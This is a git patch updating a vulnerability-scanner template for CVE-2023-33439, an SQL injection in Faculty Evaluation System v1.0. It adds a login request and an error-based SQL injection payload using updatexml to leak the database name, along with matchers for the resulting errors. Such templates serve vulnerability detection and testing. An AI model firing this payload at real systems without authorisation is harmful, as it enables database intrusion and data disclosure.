From d389ef4754d6108efd8014308d11cc7f32b3d299 Mon Sep 17 00:00:00 2001
From: Ritik Chaddha <44563978+ritikchaddha@users.noreply.github.com>
Date: Fri, 7 Jul 2023 15:30:05 +0530
Subject: [PATCH] Update CVE-2023-33439.yaml

---
 http/cves/2023/CVE-2023-33439.yaml | 21 ++++++++++++++-------
 1 file changed, 14 insertions(+), 7 deletions(-)

diff --git a/http/cves/2023/CVE-2023-33439.yaml b/http/cves/2023/CVE-2023-33439.yaml
index eb3b71accc..af59e3f2a7 100644
--- a/http/cves/2023/CVE-2023-33439.yaml
+++ b/http/cves/2023/CVE-2023-33439.yaml
@@ -1,7 +1,7 @@
 id: CVE-2023-33439
 
 info:
-  name: SQL Injection - Faculty Evaluation System
+  name: Faculty Evaluation System v1.0 - SQL Injection
   author: Harsh
   severity: high
   description: |
@@ -16,20 +16,27 @@ info:
     cwe-id: CWE-89
   metadata:
     verified: true
-  tags: cve,cve2023,sql,unauthenticated
+  tags: cve,cve2023,sqli,faculty,authenticated
+
 http:
   - raw:
       - |
-        GET /eval/admin/manage_task.php?id=1%20and%20updatexml(1,concat(0x7e,(select%20database()),0x7e),0)--+ HTTP/1.1
+        POST /ajax.php?action=login HTTP/1.1
         Host:{{Hostname}}
-        Content-Type: application/x-www-form-urlencoded
-        
+        Content-Type: application/x-www-form-urlencoded; charset=UTF-8
+
+        email={{username}}&password={{password}}&login=1
+
+      - |
+        GET /admin/manage_task.php?id=1%20and%20updatexml(1,concat(0x7e,(select%20database()),0x7e),0)--+ HTTP/1.1
+        Host:{{Hostname}}
+
     cookie-reuse: true
     redirects: true
     matchers:
       - type: dsl
         dsl:
           - 'status_code == 200'
-          - 'contains(body, "Fatal error")'
-          - 'contains(body, "Uncaught Error: Call to a member function fetch_array()")'
+          - 'contains(body, "Fatal error:")'
+          - 'contains(body, "XPATH syntax error:")'
         condition: and